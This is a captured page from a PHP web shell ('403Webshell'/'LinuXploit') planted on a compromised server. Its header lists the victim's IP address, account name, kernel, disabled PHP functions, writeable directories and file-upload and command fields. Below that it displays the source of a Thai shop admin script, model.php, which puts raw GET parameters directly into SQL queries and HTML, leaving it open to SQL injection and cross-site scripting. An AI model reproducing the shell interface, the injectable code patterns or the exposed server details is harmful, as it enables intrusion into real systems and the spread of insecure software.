403Webshell
Server IP : 103.233.193.20  /  Your IP : 216.73.216.169
Web Server : Apache/2
System : Linux host1.itclever.com 4.18.0-553.16.1.el8_10.x86_64 #1 SMP Thu Aug 8 17:47:08 UTC 2024 x86_64
User : oriscomadm ( 1120)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  /home/oriscomadm/domains/oriscom.com/private_html/admin/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : /home/oriscomadm/domains/oriscom.com/private_html/admin/model.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>ระบบหลังร้าน</title>
<link type="text/css" rel="stylesheet" href="css/common.css">
<link type="text/css" rel="stylesheet" href="css/style.css">
<link rel="stylesheet" href="../css/style-pager.css" />
<script language="javascript">
function Confirm(object){
	if(confirm('You are Sure DELETE')==true){
		return true;
	}
		return false;		
}
</script>
<?php include'../include/class-pager.php'?>
<style>
a{text-decoration:none;}
</style>
</head>

<body id="admin">
	<div id="wrapper_admin">
		<?php require_once("include/header.php"); ?>
		<div id="wrapper_centent">
			<div id="manage_button">
            <input name="" type="button" class="btn_big" value="เพิ่มรายการสินค้า" onclick="window.location='model_add.php?cid=<?php echo $_GET['cid']?>&sid=<?php echo $_GET['sid']?>&mid=<?php echo $_GET['mid']?>'" />
            
        	</div>
			<table width="100%" border="0" cellspacing="0" cellpadding="0" class="tbl">
            	  <tr class="head_tbl">
                  	<td colspan="7"><h2><div><a href="product.php?cid=<?php echo $_GET['cid']?>&sid=<?php echo $_GET['sid']?>">Level Up</a> | รายการสินค้า</div></h2></td>
                  </tr>
				  <tr class="head_tbl">
					<td colspan="7">
                    <form method="get" action="">
                    <input type="hidden" name="cid" value="<?php echo $_GET['cid']?>" />
                    <input type="hidden" name="sid" value="<?php echo $_GET['sid']?>" />
                    <input type="hidden" name="mid" value="<?php echo $_GET['mid']?>" />
                    ค้นหา&nbsp;<input type="text" name="search" class="input_user" value="<?php echo $_GET['search']?>" />&nbsp;<input type="submit" value="ค้นหา" />
                    </form>
                    </td>
				  </tr>
				  <tr class="head_tbl">
					<td width="5%">ลำดับ</td>
					<td width="15%">รูปภาพ</td>
					<td width="18%">ชื่อสินค้า &nbsp;<img src="images/flag_th.png" /></td>
					<td width="18%">ชื่อสินค้า &nbsp;<img src="images/flag_en.png" /></td>
					<td width="20%">หมวดสินค้า</td>
					<td width="8%">Show/Hide</td>
					<td width="16%" style="font-size:11px;">แก้ไข | ลบ</td>
				  </tr>
          		<?php
				if($_GET['cat']){
					mysql_query("UPDATE product_iv SET Lid='".$_GET['cat']."' WHERE id='".$_GET['id']."'");
				}
				
				if(empty($_GET['search'])){
					$where = "WHERE Lid='".$_GET['mid']."'";
				}else{
					$where = "WHERE nameen like '".$_GET['search']."%' OR nameth like '".$_GET['search']."%' ";
				}
				if($_GET['sh']){
					mysql_query("UPDATE product_iv SET shows='".$_GET['sh']."' WHERE id='".$_GET['id']."'");
				}
				$sql = "SELECT * FROM product_iv $where";
				$sqlquery = mysql_query($sql) or die ("error [".$sql."]");
				$Num_Rows = mysql_num_rows($sqlquery);
				$Per_Page = 20;
				
				$Page = $_GET["Page"];
				if(!$_GET["Page"])
				{
					$Page=1;
				}
				
				$Prev_Page = $Page-1;
				$Next_Page = $Page+1;
				
				$Page_Start = (($Per_Page*$Page)-$Per_Page);
				if($Num_Rows<=$Per_Page)
				{
					$Num_Pages =1;
				}
				else if(($Num_Rows % $Per_Page)==0)
				{
					$Num_Pages =($Num_Rows/$Per_Page) ;
				}
				else
				{
					$Num_Pages =($Num_Rows/$Per_Page)+1;
					$Num_Pages = (int)$Num_Pages;
				}
				$sql.= " ORDER BY shows DESC,id ASC,sort ASC LIMIT $Page_Start,$Per_Page";
				$rs = mysql_query($sql);
				$i=0;
				while($arr = mysql_fetch_array($rs)){
					$i++;
					if($arr['shows']==0){$show='<a href="?cid='.$_GET['cid'].'&sid='.$_GET['sid'].'&mid='.$_GET['mid'].'&sh=1&id='.$arr['id'].'"><font color="#C70003">ซ่อน</font></a>';}
					if($arr['shows']==1){$show='<a href="?cid='.$_GET['cid'].'&sid='.$_GET['sid'].'&mid='.$_GET['mid'].'&sh=00&id='.$arr['id'].'"><font color="#00CB30">แสดง</font></a>';}
				?>       
				  <tr>
					<td><?php echo $i?></td>
					<td><img src="<?php echo PATH?>/<?php echo $arr['image']?>" width="120" /></td>
					<td><?php echo $arr['nameth']?></td>
					<td><?php echo $arr['nameen']?></td>
					<td>
                    <form method="get" action="<?php echo $_SERVER['php_self']?>">
                    <input type="hidden" name="cid" value="<?php echo $_GET['cid']?>" />
                    <input type="hidden" name="sid" value="<?php echo $_GET['sid']?>" />
                    <input type="hidden" name="mid" value="<?php echo $_GET['mid']?>" />
                    <input type="hidden" name="id" value="<?php echo $arr['id']?>" />
                    <select name="cat" onchange="this.form.submit();">
					<?php
					$sql2="SELECT * FROM product_iii";
					$result = mysql_query($sql2);
					while($sclass=mysql_fetch_array($result)){
						$sql3=mysql_query("SELECT * FROM product_ii WHERE id='".$sclass['Lid']."'");
						$PL2=mysql_fetch_array($sql3);
						$sql4=mysql_query("SELECT * FROM product_i WHERE id='".$PL2['Lid']."'");
						$PL1=mysql_fetch_array($sql4);
						if($sclass['id']==$arr['Lid']){$s="selected";}else{$s="";}
						echo '<option value="'.$sclass['id'].'" '.$s.'>'.$PL1['nameth'].' &rarr; '.$PL2['nameth'].' &rarr; '.$sclass['nameth'].'</option>';
					}
					?>
                    </select>
                    </form>
                    </td>
					<td><?php echo $show?></td>
					<td>
						<span class="current"><a href="model_list.php?cid=<?php echo $_GET['cid']?>&sid=<?php echo $_GET['sid']?>&mid=<?php echo $_GET['mid']?>&lid=<?php echo $arr['id']?>"><img src="images/menu/product.png" height="26" title="ดูรายการสินค้า" /></a></span>  
						<span class="edit"><a href="model_edit.php?cid=<?php echo $_GET['cid']?>&sid=<?php echo $_GET['sid']?>&mid=<?php echo $_GET['mid']?>&id=<?php echo $arr['id']?>"><img src="images/edit.png" height="24" title="แก้ไข" /></a></span>  
						<span class="delete"><a href="function.php?ac=model_del&cid=<?php echo $_GET['cid']?>&sid=<?php echo $_GET['sid']?>&mid=<?php echo $_GET['mid']?>&id=<?php echo $arr['id']?>" onclick="return Confirm(this);"><img src="images/delete.png" height="24" title="ลบ" /></a></span>
					</td>
				  </tr>
                 <?php }?>
			</table>
            <br />
            <div align="right">
			<?php
            $pages = new Paginator;
            $pages->items_total = $Num_Rows;
            $pages->mid_range = 10;
            $pages->current_page = $Page;
            $pages->default_ipp = $Per_Page;
            $pages->url_next = $_SERVER["PHP_SELF"]."?cid=".$_GET['cid']."&sid=".$_GET['sid']."&mid=".$_GET['mid']."&id=".$_GET['id']."&Page=";
            $pages->paginate();
            echo $pages->display_pages()
            ?>
			</div>
		</div>
</div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit